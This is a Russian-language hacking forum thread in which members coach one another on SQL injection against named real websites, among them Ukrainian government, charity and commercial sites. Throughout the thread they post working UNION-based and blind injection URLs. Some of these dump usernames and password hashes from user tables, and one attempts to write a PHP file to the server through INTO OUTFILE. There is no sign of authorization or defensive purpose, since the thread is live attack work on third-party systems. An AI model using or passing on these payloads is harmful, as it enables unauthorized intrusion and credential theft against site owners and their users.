Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. migjee

    migjee New Member

    Joined:
    13 Jun 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
    вот тут уязвимость
    http://rp-gameworld.ru/index.php?c=registration&action=reg
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Раскрытие путей же. Где тут инъекцию увидел?
     
    _________________________
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://www.redcross.org.ua/modules/news/index.php?id=-999
    Ошибка вызывается только при дефисе перед переменной, при подбирании столбцов всё рушиться, обойти пробелы /**/ не получается..
    Текст ошибки: SELECT * FROM aadm_menu WHERE id=: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    SECOND QUESTION ============================
    Code:
    http://www.amnu.gov.ua/index.php?p=calendar&action=events&show=public&sys_monat=08&sys_jahr=2013&sys_tag=[COLOR=DarkOliveGreen]24+union+select+1+--+[/COLOR]&area=1#999
    Выдаёт следующие:
    Code:
     [COLOR=Red]Notice: Use of undefined constant HTTP - assumed 'HTTP' in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 70 Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 71 
    Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Redir.php on line 22  [/COLOR]
    
    что-нибудь может с этого получится
    3 ==== вот это ещё интересно
    Code:
    http://ua.oriflame.com/utils/messages/message.jhtml?textKey=conference_not_available[COLOR=Red]'[/COLOR]&_requestid=406406
    Error: Could not find resourcestring: key: conference_not_available' bundleName: com.oriflame.bundles.oriLiteralBundle
    Тут вообще выходит всплывающее окно и не даёт дальше крутить
    Code:
    http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
    http://www.titanchair.ca/sub.php?db_cid=2%27
     
    #22443 Unknowhacker, 23 Aug 2013
    Last edited: 24 Aug 2013
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Здесь фильтр, но select+union пропускает:

    1 случай: +union+select+1,2,3,4,5,6,7,8,9,10+--+

    2 случай: +union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

    В обоих случаях поле 2 - принтабельное.
     
  5. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Можно ли здесь что-то сделать и в каком направлении рыть?
    Code:
    http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
     
  6. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Правильно определили уязвимый параметр usr_id.

    Далее подбираем количество столбцов:

    +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

    Версия "5.1.49-Max-log"

    Вот в этом направлении.
     
  7. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Вот держи раскрученная.. я так понял.. новичок..
    Code:
    http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,6,7,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28rh_tppg.usr%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,lognme,0x3a,pwd%29%29%29%29x%29,9,10,11,12,13,14,15,16,17,18,19+--+
    P.S См. ниже графа "Очки" И уберите пробелы в URL
     
  8. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия <4.
    И можно, если несложно, объяснить, как прийти к такому результату
    -то вручную подбиралось или программой?
    -ну с union свою проблему понял,USER(),DATABASE(), VERSION() смог получить, а вот со столбцами не получается( чяднт? или там нет доступа к INFORMATION_SCHEMA?
    Code:
    http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19+from%28INFORMATION_SCHEMA.TABLES--+
     
  9. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Кавычку (%28) уберите перед INFORMATION_SCHEMA.TABLES и будет Вам счастье :)
    p.s. согласно руководству по mysql перед и после знака комменария "--" cтавится пробел, т.е. +--+
     
  10. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    есть такое, спасибо, думал (%28) что пробел.
    Code:
    http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test%22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO+OUTFILE+'tested.php'+--+
    А это почему не срабатывает?
    посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы?
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Принтабельные колонки подразумевают ЧТЕНИЕ, а НЕ ВЫПОЛНЕНИЕ запрашиваемых данных.

    Хотя я встречал исключения. Очень-очень-очень редко.

    Максимум что тут можешь выкопать - это опять же SiXSS посредством пассивной XSS в клиентском браузере. Но это опять же, выполняется на клиенте, а не на сервере.
     
    _________________________
  12. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;
    к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду
     
  13. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    У юзера бд слишком кастрированные права, файла быть не может, его и нет.
    Из доступных там бд всего 2 - текущая и information_schema, так что выводить там больше нечего.
    Code:
    http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1 union select 1,2,3,4,@a,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from(select @a:=0,(select 1 from information_schema.tables where TABLE_SCHEMA='rh_tppg' and (@a:=concat(@a,";",TABLE_NAME))))b -- w
    Например вывод таблиц из текущий базы.
     
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
    
    
    
    
    
    
    
    http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
    
    
    http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0
    
    http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции 
    P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...
     
    #22454 Unknowhacker, 29 Aug 2013
    Last edited: 30 Aug 2013
  15. AlkatrasUSA

    AlkatrasUSA New Member

    Joined:
    27 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ребят, помогите пожалуйста советом кто разбирается в скулях. БД MySQL 5.1.
    Ситуация такая:

    Уперся в глухой тупик при разборе Blind SQL injection, по типу true:false. Запрос исполнился - страница загрузилась как надо; запрос неверный - страница осталась пустой. Ручками в принципе нашел все таблицы что надо - оказались обычные джумловские, версии 1.5.15.

    Сама скуля оказалась в компоненте virtuemart. Сам запрос на проверку уязвимости выглядит так:

    Code:
    [url]http://site.ru/administrator/components/com_virtuemart/index.php?%20category_id=&page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search%20_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=0[/url] [B]or 1=1 --[/B]
    На "and" выдает ошибку (пустая страница), т.е. проходит только через "or". UNION, INSERT, UPDATE, кавычки и апострофы - в запросах также не проходят. Замена "and" или кавычек - hex кодом результата также не дает. Насчет инфы по БД, определить удалось только версию Version(), остальные функции: USER(), USER_session(), DATABASE() - определяет как ошибочные.

    Все запросы на выборку делаются примерно так:

    Code:
    ...&search_category=0 or (SELECT 1 FROM jos_users WHERE ord(substr(password,1,1))>=49 limit 0,1)=1 --
    
    [I]и так тоже работает[/I]
    
    ...&search_category=0 or (SELECT 1 FROM jos_users WHERE substr(password,1,1)>=0х6d limit 0,1)=1 --
    
    Т.е. можно сравнивать удачно как аскии код, так и hex код подбираемого символа. (Кэп)

    В случае сравнения ASCII кодов интересно то, что сравнивать можно только по ">=" или "=". Знак меньше < и меньше-равно <= сайт не понимает и выдает пустую страницу. И это как раз та проблема из-за которой не получается автоматизировать процесс с помощью какого-нибудь BlindCat или же BSQL Hacker, т.к. они в параметр {OPERATION} в любом случае подсовывают знак <. Написать на PHP свой переборщик религия не позволяет и проблема о которой описано ниже...


    Таким образом повыдирал вручную пару юзернеймов, их айди и принадлежность к группам. Проблема всплыла вот в чем, в запросе:

    Code:
    ...&search_category=0 or (SELECT 1 FROM jos_users WHERE ord(substr(password,1,1))=49 limit 0,1)=1 --
    Страница выдает true. И в этом же запросе, но с проверкой на 100-ый аскии кодд страница опять выдает true:
    Тот же true она выдает если подставить hex код символа. Т.е. такое ощущение будто на 1-ой позиции, 1-ого пароля в списке, находится сразу 2 символа. В данном случае символы "1" и "d". Также нарыл подобное совпадение где true возвращается для символов "m" и "y". (Сначала думал, что в "1" дело). И весь ананас в том, что данная проблема замечена только в колонке "password". В других колонках не замечал таких приколов, пока.

    Code:
    ...&search_category=0 or (SELECT 1 FROM jos_users WHERE ord(substr(password,1,1))=100 limit 0,1)=1 --
    ВОПРОС:
    Как такое вообще возможно? Как 1 символ может давать сразу два true? В данном случае мы выдираем md5 хеш и очевидно, каждая буква важна.
    Кто поопытнее, подскажите куда копать? :)

    Также есть доступ к php.ini. Если надо будет, могу подсмотреть какие-то параметры.
    Code:
    magic_quotes_gpc	Off	Off
    safe_mode	Off	Off
    sql.safe_mode	Off	Off
    track_errors	Off	Off
    display_errors	Off	Off
    display_startup_errors	Off	Off
    allow_url_fopen	On	On
    allow_url_include	Off	Off
    ЗЫ Подобные коллизиции пока в 2ух случаях нашел.
     
    #22455 AlkatrasUSA, 29 Aug 2013
    Last edited: 29 Aug 2013
  16. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+
    Всего один столбец. при вводе оператора UNION - Hacker attemp!
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    фильтр на select
     
    _________________________
  18. AlkatrasUSA

    AlkatrasUSA New Member

    Joined:
    27 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Не при UNION, а при SELECT :)

    6'+and+user()+like+'belav%'--+

    дальше сам бруть :)
     
    #22458 AlkatrasUSA, 29 Aug 2013
    Last edited: 29 Aug 2013
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Непонятных моментов будет меньше, если разберешься с различием в раскрутке инъекций в строковых и числовых уязвимостых параметрах:

    http://www.scrutineer.ru/results.php?id=3+order+by+8+--+
     
  20. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR
    Code:
    http://ukrcrewing.com.ua/agency%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
     
Thread Status:
Not open for further replies.